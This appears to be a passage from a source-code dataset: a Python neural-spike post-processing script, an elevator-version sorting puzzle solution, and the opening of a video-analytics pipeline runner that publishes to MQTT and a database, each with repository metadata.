=======
chi: synchrony measure
autocorr: autocorrelation of population avg \bar{data}(t)
'''
data_pop=np.mean(data, axis=0) # pop avg
sigma_pop=np.mean(np.square(data_pop)) - np.square(np.mean(data_pop))
sigma=np.mean(np.square(data), axis=1) - np.square(np.mean(data, axis=1))
sigma_mean=np.mean(sigma)
chisq=sigma_pop / sigma_mean
chi=np.sqrt(chisq)
mean_subtract=data_pop - np.mean(data_pop)
autocorr=scipy.signal.correlate(mean_subtract, mean_subtract,
mode='valid')
return chi, autocorr
def order_param(eta_norm, eta_t_norm, op_abs_thresh):
'''
Compute the order parameter for the normalized (phase) ETAs.
Parameters
==========
eta_norm: normalized ETA array
eta_t_norm: [-.5, .5] phases corresponding to second axis of array
op_abs_thresh: float
Returns
=======
ops: array of complex valued order parameters, np.nan if undefined
op_abs: magnitudes
op_angle: angles
op_mask: mask of ops with magnitude above threshold
op_angle_mean: mean angle of significant ops
op_angle_std: standard deviation of significant ops
'''
assert op_abs_thresh < 0.5 and op_abs_thresh >= 0.0,\
'op_abs_thresh out of range'
num_neurons=eta_norm.shape[0]
num_bins=eta_norm.shape[1]
dtheta=np.min(np.diff(eta_t_norm))
# below will generate NaNs if the normalization is 0
density_eta=eta_norm/np.tile(np.sum(eta_norm, axis=1),(num_bins,1)).T
ops=np.sum(density_eta*
np.exp(1.0j*
np.tile(eta_t_norm,(num_neurons,1))*
(2*np.pi)),
axis=1)
op_angle=np.angle(ops)/(2*np.pi)
op_abs=np.abs(ops)
op_mask=op_abs > op_abs_thresh
op_angle_mean=np.nanmean(op_angle[op_mask])
op_angle_std=np.nanstd(op_angle[op_mask])
return (ops,op_abs,op_angle,op_mask,op_angle_mean,op_angle_std)
def event_trig_avg(events, data, normalize=False, pts=10):
'''
Compute an event-triggered average.
Parameters
==========
events, ndarray
Array of event indices.
data, ndarray, ndim=2
Array to be averaged along dim 1 relative to the events.
normalize, bool, optional
Whether to normalize to phase variable
'''
breakpts=np.array(
np.hstack((0, (events[0:-1] + events[1:]) / 2., data.shape[1]-1)),
dtype=np.int)
if normalize:
from scipy.interpolate import griddata
max_interval=2*pts
fullrange=np.linspace(-.5, .5, num=max_interval)
xgrid1=fullrange[0:pts]
xgrid2=fullrange[pts:]
else:
max_interval=2*np.max(np.hstack((events-breakpts[0:-1],
breakpts[1:]-events)))
midpt=int(np.floor(max_interval / 2))
numevents=events.shape[0]-2 # don't use 1st and last due to boundary
eta=np.zeros((data.shape[0], max_interval))
for j in range(numevents):
i=j+1
timeidx=np.arange(int(breakpts[i]), int(breakpts[i+1]), dtype=np.int)
thisevent=events[i]
center=int(np.where(timeidx==thisevent)[0].astype(int))
if normalize:
xs1=np.array(timeidx[:center] - timeidx[center], dtype=np.float)
xs1 /= xs1[0]*(-2.0)
xs2=np.array(timeidx[center+1:] - timeidx[center], dtype=np.float)
xs2 /= xs2[-1]*2.0
xs=np.hstack((xs1, xs2))
toadd=np.apply_along_axis(lambda x:
scipy.interpolate.griddata(
xs, x, fullrange),
1, data[:,timeidx])
eta += toadd
else:
lpad=midpt - center
rpad=max_interval - (len(timeidx)+lpad)
eta += np.pad(data[:, timeidx], ((0,0), (lpad,rpad)),
'constant', constant_values=(0,0))
eta /= float(numevents)
eta[eta < 0] = 0
return eta
'''
This method is adapted from the old main methods of the code, this method will do all the post processing
and allow for it to be ran indpendently of main to allow for passing in of dictionaries withouth saving and loading them to the hard disc to avoid excess memory usage
Output:
mdict - The dictionary of final variables and results. Can either be saved or used as is.
'''
def run(sim_output,trans,sec_flag,spike_thresh,f_sigma,butter_low,butter_high,bin_width,cutoff,are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh):
butter_freq = np.array([butter_low,butter_high])
if sec_flag:
scalet=1e3
else:
scalet = 1
graph_fn = ''
if isinstance(sim_output['graphFn'],np.ndarray):
graph_fn = str(sim_output['graphFn'][0])
else:
graph_fn = sim_output['graphFn']
#Retrieve parameters from dictionary and data
dt = float(sim_output['dt'])*scalet
data = chop_transient(sim_output['Y'],trans,dt)
num_neurons = np.shape(data)[0]
tmax = np.shape(data)[1]
#Generate spike trains from the data and bin the spikes
if are_volts:
spikes, spike_mat = find_spikes(data, spike_thresh)
else:
data = scipy.sparse.csc.csc_matrix(data)
spike_mat= data.todense()
spikes = data.nonzero()
bins, spike_mat_bin = bin_spikes(spike_mat, bin_width, dt)
#Get the different versions of the filtered data
spike_fil_bin, butter_int_bin, spike_fil_butter = spikes_filt(spike_mat_bin[:num_neurons/2],
dt*bin_width,
f_sigma,
butter_freq)
spike_fil_bin2, butter_int_bin2, spike_fil_butter2 = spikes_filt(spike_mat_bin[num_neurons/2:],
dt*bin_width,
f_sigma,
butter_freq)
#Calculate Correlation Values
cross_correlation = xcorr(butter_int_bin2,butter_int_bin)
auto_cross_correlation1 = xcorr(butter_int_bin,butter_int_bin)
auto_cross_correlation2 = xcorr(butter_int_bin2,butter_int_bin2)
#phase_lag,pop_corr = find_metrics(cross_correlation,auto_cross_correlation1)
#graph attributes
cells_inhib,graph_edges,number_of_nodes,degree_histogram = get_graphinfo(graph_fn)
#Calculating Values for Circle Map
pop_burst_peak1 = burst_stats(butter_int_bin,peak_order,peak_percentile,dt*bin_width/1000.)
pop_burst_peak2 = burst_stats(butter_int_bin2,peak_order,peak_percentile,dt*bin_width/1000.)
phis = get_phis(pop_burst_peak1,pop_burst_peak2,bins)
complex_phis = map_phi_to_complex(phis)
mean_angle,variance_angle = get_circular_statistics(complex_phis)
mean_phi = get_normalized_phi(mean_angle)
#std_phi = np.std(phis)
#Get Synchrony Values for each signal
chi1,chi1_auto = synchrony_stats(spike_fil_bin,dt*bin_width/1000.)
chi2,chi2_auto = synchrony_stats(spike_fil_bin2,dt*bin_width/1000.)
'''##Compute event triggered averages and get individual cell statistics
##Population 1
##Normalize time to phase variable [-.5,.5]
eta1_norm = event_trig_avg(pop_burst_peak1,spike_fil_bin,normalize=True,pts=eta_norm_pts)
eta1_t_norm = np.linspace(-0.5, 0.5, 2*eta_norm_pts)
##Order Parameters
(ops1,op_abs1,op_angle1,op_mask1,
op_angle_mean1,op_angle_std1)=order_param(eta1_norm,eta1_t_norm,op_abs_thresh)
##Population 2
##Normalize time to phase variable [-.5,.5]
eta2_norm = event_trig_avg(pop_burst_peak2,spike_fil_bin2,normalize=True,pts=eta_norm_pts)
eta2_t_norm = np.linspace(-0.5, 0.5, 2*eta_norm_pts)
##Order Parameters
(ops2,op_abs2,op_angle2,op_mask2,
op_angle_mean2,op_angle_std2)=order_param(eta2_norm,eta2_t_norm,op_abs_thresh)'''
mdict = {'bins':bins,
'spike_mat':spike_mat,
'spike_mat_bin':spike_mat_bin,
'spike_fil_bin':spike_fil_bin,
'spike_fil_bin':spike_fil_bin2,
'butter_int_bin': butter_int_bin,
'butter_int_bin2': butter_int_bin2,
'cross_correlation': cross_correlation,
'auto_cross_correlation1':auto_cross_correlation1,
'auto_cross_correlation2':auto_cross_correlation2,
'cells_inhib': cells_inhib,
'graph_edges':graph_edges,
'number_of_nodes':number_of_nodes,
'degree_histogram':degree_histogram,
#'phase_lag': phase_lag,
#'pop_correlation': pop_corr,
'time': sim_output['tf'],
'bin_width': bin_width,
'phis' : phis,
'mean_phi': mean_phi,
'variance_angle' : variance_angle,
'chi1' : chi1,
'chi2' : chi2,
'pop_burst_peak1': pop_burst_peak1,
'pop_burst_peak2': pop_burst_peak2
#'op_abs1' : op_abs1,
#'op_angle1' : op_angle1,
#'op_angle_mean1' : op_angle_mean1,
#'op_angle_std1' : op_angle_std1,
#'op_abs2' : op_abs2,
#'op_angle2' : op_angle2,
#'op_angle_mean2' : op_angle_mean2,
#'op_angle_std2' : op_angle_std2
}
return mdict
def main(argv=None):
should_save = True
if argv is None:
argv = sys.argv
else:
should_save = False
(simFn, outFn, trans, sec_flag, spike_thresh, f_sigma, butter_low,
butter_high, bin_width, cutoff, are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh) = parse_args(argv)
sim_output = scipy.io.loadmat(simFn)
post_dict = run(sim_output,trans,sec_flag,spike_thresh,f_sigma,butter_low,butter_high,bin_width,cutoff,are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh)
if should_save:
scipy.io.savemat(outFn,post_dict,oned_as ='column')
else:
return post_dict
if __name__ == '__main__':
status = main()
sys.exit(status)
| 37.757971 | 188 | 0.630446 |
import sys
import numpy as np
import scipy.signal
import scipy.io
import argparse
import networkx as nx
import matplotlib.pyplot as plt
import cmath
import math
maxorder=20
eta_norm_pts = 10
def parse_args(argv):
transient = 10000
spike_thresh = -20
f_sigma = 20
butter_high = 4
butter_low = -np.inf
bin_width = 20
cutoff = 0.5
peak_order = 30
peak_percentile = 75
eta_norm_pts=8
op_abs_thresh=0.2
parser = argparse.ArgumentParser(prog="doPost",
description=('Postprocessing of'
' model output'))
parser.add_argument('sim', help='model output (.mat) file')
parser.add_argument('output', help='output (.jpg) filename')
parser.add_argument('--transient', '-t',
help='transient time, ms (default: %(default)s)',
type=float, default=transient)
parser.add_argument('--sec', '-s', action='store_true',
help='time units are in seconds (default: ms)')
parser.add_argument('--volt', '-V', action='store_true',
help=('file contains voltage traces '
'(default: sparse spike trains)'))
parser.add_argument('--thresh',
help='spike threshold, mV (default: %(default)s)',
type=float, default=spike_thresh)
parser.add_argument('--fsig', '-f',
help=('filter standard deviation, ms '
'(default: %(default)s)'),
type=float, default=f_sigma)
parser.add_argument('--butter_high',
help=('Butterworth filter upper cutoff frequency, Hz '
'(default: %(default)s)'),
type=float, default=butter_high)
parser.add_argument('--butter_low',
help=('Butterworth filter lower cutoff frequency, Hz '
'(default: %(default)s)'),
type=float, default=butter_low)
parser.add_argument('--bin_width', '-b',
help='bin width, ms (default: %(default)s)',
type=float, default=bin_width)
parser.add_argument('--cut', '-c',
help='burst cutoff parameter (default: %(default)s)',
type=float, default=cutoff)
args = parser.parse_args(argv[1:])
return args.sim, args.output, args.transient, args.sec, args.thresh, \
args.fsig, args.butter_low, args.butter_high, args.bin_width,\
args.cut, args.volt,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh,
def chop_transient(data, transient, dt):
firstIdx = int(np.ceil(transient / dt) - 1)
return data[:,firstIdx:]
def find_spikes(data, threshold):
indices = scipy.signal.argrelmax(data, axis=1)
mask = np.where(data[indices] > threshold)
new_indices = (indices[0][mask],
indices[1][mask])
spike_mat = np.zeros(np.shape(data), dtype=np.int)
spike_mat[new_indices] = 1
return new_indices, spike_mat
def spikes_of_neuron(spikes, neuron):
return spikes[1][np.where(spikes[0] == neuron)]
def spikes_filt(spike_mat, samp_freq, f_sigma, butter_freq):
def filt_window_gauss(samp_freq, std = 20, width = None, normalize = 1):
if width is None:
width = std*4+1
width /= samp_freq
std /= samp_freq
w = scipy.signal.gaussian(width, std)
if not normalize == 0:
w = normalize * w / sum(w)
return w
def filt_gauss(spike_mat, samp_freq, f_sigma=20):
w = filt_window_gauss(samp_freq, std=f_sigma, normalize=1)
spike_fil = scipy.signal.fftconvolve(spike_mat, w[ np.newaxis, : ],
mode='same')
return spike_fil
def filt_butter(data, samp_freq, butter_freq, axis=-1):
order = 2
ny = 0.5 / samp_freq
cof = butter_freq / ny
if np.isneginf(cof[0]) and np.isfinite(cof[1]):
cof1 = cof[1]
b, a = scipy.signal.butter(order, cof1, btype='low')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
elif np.isfinite(cof[0]) and np.isinf(cof[1]):
cof1 = cof[0]
b, a = scipy.signal.butter(order, cof1, btype='high')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
elif np.isfinite(cof[0]) and np.isfinite(cof[1]):
b, a = scipy.signal.butter(order, cof, btype='band')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
else:
raise Exception('filt_butter called with bad cutoff frequency')
filtNs /= samp_freq
return filtNs
spike_fil = filt_gauss(spike_mat, samp_freq, f_sigma=f_sigma)
int_signal = filt_butter(np.mean(spike_mat, axis=0),
samp_freq*1e-3, butter_freq)
spike_fil_butter = filt_butter(spike_fil, samp_freq*1e-3,
butter_freq, axis=1)
return spike_fil, int_signal, spike_fil_butter
def bin_spikes(spike_mat, bin_width, dt):
num_neurons= np.shape(spike_mat)[0]
num_times = np.shape(spike_mat)[1]
stride = int(np.ceil(bin_width / dt))
bins = np.arange(0, num_times, stride, dtype=np.float)
which_bins = np.digitize(range(0, num_times), bins)
num_bins = len(bins)
binned_spikes = np.zeros((num_neurons, num_bins), dtype=np.int)
for i in range(num_bins):
bin_mask = np.where(which_bins == i)[0]
bin_data = spike_mat[:,bin_mask]
binned_spikes[:,i] = np.sum(bin_data, axis=1).flatten()
return bins, binned_spikes
def xcorr(signal_1,signal_2):
signal_1 = np.asarray(signal_1)
signal_2 = np.asarray(signal_2)
m1 = np.mean(signal_1)
m2 = np.mean(signal_2)
signal_1_centered = (signal_1 - m1) / (np.std(signal_1) * len(signal_1))
signal_2_centered = (signal_2 - m2) / np.std(signal_2)
xcorr = scipy.signal.correlate(signal_1_centered,signal_2_centered)
return xcorr
def get_graphinfo(graph_fn):
graph = nx.read_gml(graph_fn)
cells_inhib = np.array(nx.get_node_attributes(graph, 'inh').values(),
dtype=np.int)
graph_edges = nx.edges(graph)
number_of_nodes = nx.number_of_nodes(graph)
degree_histogram = nx.degree_histogram(graph)
return cells_inhib, graph_edges,number_of_nodes,degree_histogram
def find_max_time(peak_times,signal):
max_time = np.nan
for t in peak_times:
if np.isnan(max_time):
max_time = t
elif signal[t] > signal[max_time]:
max_time = t
return max_time
def find_metrics(xcorr,autocorr):
max_time_cross = np.nan;
peak_auto = scipy.signal.argrelmax(autocorr)[0].tolist()
peak_cross = scipy.signal.argrelmax(xcorr)[0].tolist()
max_time = find_max_time(peak_auto,autocorr)
for i in range(peak_auto.index(max_time)+1,len(peak_auto)):
if autocorr[peak_auto[i]] > 0:
max_time_next = peak_auto[i]
break
for x in peak_cross:
if x > max_time and x < max_time_next and xcorr[x] > 0:
max_time_cross = x
break
auto_period = max_time_next - max_time
auto_cross_perioid = max_time_cross - max_time
phase = float(auto_cross_perioid)/float(auto_period)
return phase, xcorr[max_time_cross]
def burst_stats(signal,peak_order,peak_percentile,dt):
pop_burst_peak=scipy.signal.argrelmax(signal, order=peak_order)[0]
pop_burst_peak=pop_burst_peak[signal[pop_burst_peak] >
np.percentile(signal,peak_percentile)]
return pop_burst_peak
def get_phis(pop_burst_peak1,pop_burst_peak2,bins):
phis = []
windowStartIndex = 0
windowEndIndex = 1
while windowEndIndex < len(pop_burst_peak1):
windowStart = pop_burst_peak1[windowStartIndex]
windowEnd = pop_burst_peak1[windowEndIndex]
peaksInWindow = [i for i in pop_burst_peak2 if i >= windowStart and i <= windowEnd]
for peak in peaksInWindow:
phi = (bins[peak] - bins[windowStart]) / (bins[windowEnd] - bins[windowStart])
phis.append(phi)
windowStartIndex = windowEndIndex
windowEndIndex = windowEndIndex + 1
return phis
def map_phi_to_complex(phis):
complex = []
for i in range(len(phis)):
radians = 2*np.pi*phis[i]
complex.append(cmath.rect(1,radians))
return complex
def get_circular_statistics(complex_values):
mean_resultant = np.mean(complex_values)
mean_angle = cmath.phase(mean_resultant)
variance_circular = abs(mean_resultant)
return mean_angle,variance_circular
def get_normalized_phi(mean_angle):
if mean_angle < 0:
return (2*math.pi + mean_angle) / (2*math.pi)
else:
return mean_angle / (2*math.pi)
def synchrony_stats(data, dt, maxlags=3000):
data_pop=np.mean(data, axis=0)
sigma_pop=np.mean(np.square(data_pop)) - np.square(np.mean(data_pop))
sigma=np.mean(np.square(data), axis=1) - np.square(np.mean(data, axis=1))
sigma_mean=np.mean(sigma)
chisq=sigma_pop / sigma_mean
chi=np.sqrt(chisq)
mean_subtract=data_pop - np.mean(data_pop)
autocorr=scipy.signal.correlate(mean_subtract, mean_subtract,
mode='valid')
return chi, autocorr
def order_param(eta_norm, eta_t_norm, op_abs_thresh):
assert op_abs_thresh < 0.5 and op_abs_thresh >= 0.0,\
'op_abs_thresh out of range'
num_neurons=eta_norm.shape[0]
num_bins=eta_norm.shape[1]
dtheta=np.min(np.diff(eta_t_norm))
density_eta=eta_norm/np.tile(np.sum(eta_norm, axis=1),(num_bins,1)).T
ops=np.sum(density_eta*
np.exp(1.0j*
np.tile(eta_t_norm,(num_neurons,1))*
(2*np.pi)),
axis=1)
op_angle=np.angle(ops)/(2*np.pi)
op_abs=np.abs(ops)
op_mask=op_abs > op_abs_thresh
op_angle_mean=np.nanmean(op_angle[op_mask])
op_angle_std=np.nanstd(op_angle[op_mask])
return (ops,op_abs,op_angle,op_mask,op_angle_mean,op_angle_std)
def event_trig_avg(events, data, normalize=False, pts=10):
breakpts=np.array(
np.hstack((0, (events[0:-1] + events[1:]) / 2., data.shape[1]-1)),
dtype=np.int)
if normalize:
from scipy.interpolate import griddata
max_interval=2*pts
fullrange=np.linspace(-.5, .5, num=max_interval)
xgrid1=fullrange[0:pts]
xgrid2=fullrange[pts:]
else:
max_interval=2*np.max(np.hstack((events-breakpts[0:-1],
breakpts[1:]-events)))
midpt=int(np.floor(max_interval / 2))
numevents=events.shape[0]-2
eta=np.zeros((data.shape[0], max_interval))
for j in range(numevents):
i=j+1
timeidx=np.arange(int(breakpts[i]), int(breakpts[i+1]), dtype=np.int)
thisevent=events[i]
center=int(np.where(timeidx==thisevent)[0].astype(int))
if normalize:
xs1=np.array(timeidx[:center] - timeidx[center], dtype=np.float)
xs1 /= xs1[0]*(-2.0)
xs2=np.array(timeidx[center+1:] - timeidx[center], dtype=np.float)
xs2 /= xs2[-1]*2.0
xs=np.hstack((xs1, xs2))
toadd=np.apply_along_axis(lambda x:
scipy.interpolate.griddata(
xs, x, fullrange),
1, data[:,timeidx])
eta += toadd
else:
lpad=midpt - center
rpad=max_interval - (len(timeidx)+lpad)
eta += np.pad(data[:, timeidx], ((0,0), (lpad,rpad)),
'constant', constant_values=(0,0))
eta /= float(numevents)
eta[eta < 0] = 0
return eta
def run(sim_output,trans,sec_flag,spike_thresh,f_sigma,butter_low,butter_high,bin_width,cutoff,are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh):
butter_freq = np.array([butter_low,butter_high])
if sec_flag:
scalet=1e3
else:
scalet = 1
graph_fn = ''
if isinstance(sim_output['graphFn'],np.ndarray):
graph_fn = str(sim_output['graphFn'][0])
else:
graph_fn = sim_output['graphFn']
#Retrieve parameters from dictionary and data
dt = float(sim_output['dt'])*scalet
data = chop_transient(sim_output['Y'],trans,dt)
num_neurons = np.shape(data)[0]
tmax = np.shape(data)[1]
#Generate spike trains from the data and bin the spikes
if are_volts:
spikes, spike_mat = find_spikes(data, spike_thresh)
else:
data = scipy.sparse.csc.csc_matrix(data)
spike_mat= data.todense()
spikes = data.nonzero()
bins, spike_mat_bin = bin_spikes(spike_mat, bin_width, dt)
#Get the different versions of the filtered data
spike_fil_bin, butter_int_bin, spike_fil_butter = spikes_filt(spike_mat_bin[:num_neurons/2],
dt*bin_width,
f_sigma,
butter_freq)
spike_fil_bin2, butter_int_bin2, spike_fil_butter2 = spikes_filt(spike_mat_bin[num_neurons/2:],
dt*bin_width,
f_sigma,
butter_freq)
#Calculate Correlation Values
cross_correlation = xcorr(butter_int_bin2,butter_int_bin)
auto_cross_correlation1 = xcorr(butter_int_bin,butter_int_bin)
auto_cross_correlation2 = xcorr(butter_int_bin2,butter_int_bin2)
#phase_lag,pop_corr = find_metrics(cross_correlation,auto_cross_correlation1)
#graph attributes
cells_inhib,graph_edges,number_of_nodes,degree_histogram = get_graphinfo(graph_fn)
#Calculating Values for Circle Map
pop_burst_peak1 = burst_stats(butter_int_bin,peak_order,peak_percentile,dt*bin_width/1000.)
pop_burst_peak2 = burst_stats(butter_int_bin2,peak_order,peak_percentile,dt*bin_width/1000.)
phis = get_phis(pop_burst_peak1,pop_burst_peak2,bins)
complex_phis = map_phi_to_complex(phis)
mean_angle,variance_angle = get_circular_statistics(complex_phis)
mean_phi = get_normalized_phi(mean_angle)
#std_phi = np.std(phis)
#Get Synchrony Values for each signal
chi1,chi1_auto = synchrony_stats(spike_fil_bin,dt*bin_width/1000.)
chi2,chi2_auto = synchrony_stats(spike_fil_bin2,dt*bin_width/1000.)
mdict = {'bins':bins,
'spike_mat':spike_mat,
'spike_mat_bin':spike_mat_bin,
'spike_fil_bin':spike_fil_bin,
'spike_fil_bin':spike_fil_bin2,
'butter_int_bin': butter_int_bin,
'butter_int_bin2': butter_int_bin2,
'cross_correlation': cross_correlation,
'auto_cross_correlation1':auto_cross_correlation1,
'auto_cross_correlation2':auto_cross_correlation2,
'cells_inhib': cells_inhib,
'graph_edges':graph_edges,
'number_of_nodes':number_of_nodes,
'degree_histogram':degree_histogram,
#'phase_lag': phase_lag,
#'pop_correlation': pop_corr,
'time': sim_output['tf'],
'bin_width': bin_width,
'phis' : phis,
'mean_phi': mean_phi,
'variance_angle' : variance_angle,
'chi1' : chi1,
'chi2' : chi2,
'pop_burst_peak1': pop_burst_peak1,
'pop_burst_peak2': pop_burst_peak2
#'op_abs1' : op_abs1,
#'op_angle1' : op_angle1,
#'op_angle_mean1' : op_angle_mean1,
#'op_angle_std1' : op_angle_std1,
#'op_abs2' : op_abs2,
#'op_angle2' : op_angle2,
#'op_angle_mean2' : op_angle_mean2,
#'op_angle_std2' : op_angle_std2
}
return mdict
def main(argv=None):
should_save = True
if argv is None:
argv = sys.argv
else:
should_save = False
(simFn, outFn, trans, sec_flag, spike_thresh, f_sigma, butter_low,
butter_high, bin_width, cutoff, are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh) = parse_args(argv)
sim_output = scipy.io.loadmat(simFn)
post_dict = run(sim_output,trans,sec_flag,spike_thresh,f_sigma,butter_low,butter_high,bin_width,cutoff,are_volts,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh)
if should_save:
scipy.io.savemat(outFn,post_dict,oned_as ='column')
else:
return post_dict
if __name__ == '__main__':
status = main()
sys.exit(status)
| true | true |
1c33382a90cfba888a05b51de0ec3f4456a3473f | 4,373 | py | Python | Code/fun3.py | HalforcNull/Research_PatternRecognition | e9cbe8df75ae775e0ed813ac4956973b4e857979 | [
"MIT"
] | null | null | null | Code/fun3.py | HalforcNull/Research_PatternRecognition | e9cbe8df75ae775e0ed813ac4956973b4e857979 | [
"MIT"
] | null | null | null | Code/fun3.py | HalforcNull/Research_PatternRecognition | e9cbe8df75ae775e0ed813ac4956973b4e857979 | [
"MIT"
] | null | null | null | """
Elevator Maintenance
====================
You've been assigned the onerous task of elevator maintenance - ugh! It wouldn't be so bad, except that all the elevator documentation has been lying in a disorganized pile at the bottom of a filing cabinet for years, and you don't even know what elevator version numbers you'll be working on.
Elevator versions are represented by a series of numbers, divided up into major, minor and revision integers. New versions of an elevator increase the major number, e.g. 1, 2, 3, and so on. When new features are added to an elevator without being a complete new version, a second number named "minor" can be used to represent those new additions, e.g. 1.0, 1.1, 1.2, etc. Small fixes or maintenance work can be represented by a third number named "revision", e.g. 1.1.1, 1.1.2, 1.2.0, and so on. The number zero can be used as a major for pre-release versions of elevators, e.g. 0.1, 0.5, 0.9.2, etc (Commander Lambda is careful to always beta test her new technology, with her loyal henchmen as subjects!).
Given a list of elevator versions represented as strings, write a function answer(l) that returns the same list sorted in ascending order by major, minor, and revision number so that you can identify the current elevator version. The versions in list l will always contain major numbers, but minor and revision numbers are optional. If the version contains a revision number, then it will also have a minor number.
For example, given the list l as ["1.1.2", "1.0", "1.3.3", "1.0.12", "1.0.2"], the function answer(l) would return the list ["1.0", "1.0.2", "1.0.12", "1.1.2", "1.3.3"]. If two or more versions are equivalent but one version contains more numbers than the others, then these versions must be sorted ascending based on how many numbers they have, e.g ["1", "1.0", "1.0.0"]. The number of elements in the list l will be at least 1 and will not exceed 100.
Languages
=========
To provide a Python solution, edit solution.py
To provide a Java solution, edit solution.java
Test cases
==========
Inputs:
(string list) l = ["1.1.2", "1.0", "1.3.3", "1.0.12", "1.0.2"]
Output:
(string list) ["1.0", "1.0.2", "1.0.12", "1.1.2", "1.3.3"]
Inputs:
(string list) l = ["1.11", "2.0.0", "1.2", "2", "0.1", "1.2.1", "1.1.1", "2.0"]
Output:
(string list) ["0.1", "1.1.1", "1.2", "1.2.1", "1.11", "2", "2.0", "2.0.0"]
"""
class node:
left = None
right = None
father = None
value = ''
def __init__(self, v, father):
self.value = v
self.father = father
def isBefore(self, n):
lc = self.value.split('.')
ln = n.split('.')
for i in range(0, min(len(lc), len(ln))):
if int(lc[i]) == int(ln[i]):
continue
if int(lc[i]) > int(ln[i]):
return False
if int(lc[i]) < int(ln[i]):
return True
if len(lc) < len(ln):
return True
else:
return False
def printSub(self):
result = []
if self.left is not None:
result = result + self.left.printSub()
result = result + [self.value]
if self.right is not None:
result = result + self.right.printSub()
return result
class Tree:
root = None
def insert(self, v):
if self.root == None:
self.root = node(v, None)
print('insert root: ' +v)
return
current = self.root
while True:
if current is None:
current = node(v, current)
return
if current.isBefore(v):
if current.right is None:
current.right = node(v, current)
return
else:
current = current.right
else:
if current.left is None:
current.left = node(v, current)
return
else:
current = current.left
def printTree(self):
if self.root is None:
return None
else:
return self.root.printSub()
def answer(l):
# your code here
myTree = Tree()
for v in l:
myTree.insert(v)
return myTree.printTree()
| 40.490741 | 707 | 0.576263 |
class node:
left = None
right = None
father = None
value = ''
def __init__(self, v, father):
self.value = v
self.father = father
def isBefore(self, n):
lc = self.value.split('.')
ln = n.split('.')
for i in range(0, min(len(lc), len(ln))):
if int(lc[i]) == int(ln[i]):
continue
if int(lc[i]) > int(ln[i]):
return False
if int(lc[i]) < int(ln[i]):
return True
if len(lc) < len(ln):
return True
else:
return False
def printSub(self):
result = []
if self.left is not None:
result = result + self.left.printSub()
result = result + [self.value]
if self.right is not None:
result = result + self.right.printSub()
return result
class Tree:
root = None
def insert(self, v):
if self.root == None:
self.root = node(v, None)
print('insert root: ' +v)
return
current = self.root
while True:
if current is None:
current = node(v, current)
return
if current.isBefore(v):
if current.right is None:
current.right = node(v, current)
return
else:
current = current.right
else:
if current.left is None:
current.left = node(v, current)
return
else:
current = current.left
def printTree(self):
if self.root is None:
return None
else:
return self.root.printSub()
def answer(l):
myTree = Tree()
for v in l:
myTree.insert(v)
return myTree.printTree()
| true | true |
1c333855ffae6255eb2af9e2088e8ddac49d027a | 8,938 | py | Python | analytics/common/runva.py | dhaval-zala/smart_city_ | c555253b57c442cb27e1e5a642cce25ae8bfa564 | [
"BSD-3-Clause"
] | null | null | null | analytics/common/runva.py | dhaval-zala/smart_city_ | c555253b57c442cb27e1e5a642cce25ae8bfa564 | [
"BSD-3-Clause"
] | null | null | null | analytics/common/runva.py | dhaval-zala/smart_city_ | c555253b57c442cb27e1e5a642cce25ae8bfa564 | [
"BSD-3-Clause"
] | 1 | 2022-03-23T12:07:41.000Z | 2022-03-23T12:07:41.000Z | #!/usr/bin/python3
from db_common import DBCommon
from db_query import DBQuery
from paho.mqtt.client import Client
from db_ingest import DBIngest
from threading import Event
from vaserving.vaserving import VAServing
from vaserving.pipeline import Pipeline
from configuration import env
import time
import traceback
import psutil
mqtthost = env["MQTTHOST"]
dbhost = env["DBHOST"]
dbmhost = env["DBMHOST"]
every_nth_frame = int(env["EVERY_NTH_FRAME"])
office = list(map(float, env["OFFICE"].split(",")))
class RunVA(object):
def _test_mqtt_connection(self):
print("testing mqtt connection", flush=True)
mqtt = Client()
while True:
try:
mqtt.connect(mqtthost)
break
except:
print("Waiting for mqtt...", flush=True)
time.sleep(5)
print("mqtt connected", flush=True)
mqtt.disconnect()
def __init__(self, pipeline, version="2", stop=Event()):
super(RunVA, self).__init__()
self._test_mqtt_connection()
self._pipeline = pipeline
self._version = version
self._db = DBIngest(host=dbhost, index="algorithms", office=office)
self._db_activity = DBIngest(host = dbmhost, index="activity", office=office)
self._stop=stop
def stop(self):
print("stopping", flush=True)
self._stop.set()
def loop(self, sensor, location, uri, algorithm, algorithmName, options={}, topic="analytics"):
try:
VAServing.start({
'model_dir': '/home/models',
'pipeline_dir': '/home/pipelines',
'max_running_pipelines': 1,
})
try:
source={
"type": "uri",
"uri": uri,
}
destination={
"type": "mqtt",
"host": mqtthost,
"clientid": algorithm,
"topic": topic
}
tags={
"sensor": sensor,
"location": location,
"algorithm": algorithmName,
"office": {
"lat": office[0],
"lon": office[1]
},
}
parameters = {
"inference-interval": every_nth_frame,
"recording_prefix": "/tmp/rec/" + sensor
}
parameters.update(options)
pipeline = VAServing.pipeline(self._pipeline, self._version)
print("pipelinepipeline", self._pipeline)
instance_id = pipeline.start(source=source,
destination=destination,
tags=tags,
parameters=parameters)
if instance_id is None:
raise Exception("Pipeline {} version {} Failed to Start".format(
self._pipeline, self._version))
self._stop.clear()
while not self._stop.is_set():
status = pipeline.status()
print(status, flush=True)
if status.state.stopped():
print("Pipeline {} Version {} Instance {} Ended with {}".format(
self._pipeline, self._version, instance_id, status.state.name),
flush=True)
break
if status.avg_fps > 0 and status.state is Pipeline.State.RUNNING:
avg_pipeline_latency = status.avg_pipeline_latency
if not avg_pipeline_latency: avg_pipeline_latency = 0
try:
self._db.update(algorithm, {
"sensor": sensor,
"performance": status.avg_fps,
"latency": avg_pipeline_latency * 1000,
"cpu": psutil.cpu_percent(),
"memory": psutil.virtual_memory().percent,
})
try:
dbb = DBQuery(host = dbhost, index = "botconfigs", office=office)
# print("sensorsensor",sensor)
for botconfig in dbb.search("sensorId:'"+str(sensor)+"'"):
activityId = botconfig["_source"]["activityId"]
botId = botconfig["_source"]["botId"]
kpisId = botconfig["_source"]["kpisId"]
site_id = botconfig["_source"]["siteId"]
nodeId = botconfig["_source"]["nodeId"]
_dba = DBCommon(host = dbhost, index = "activities", office=office)
activity_index = _dba.get(activityId)
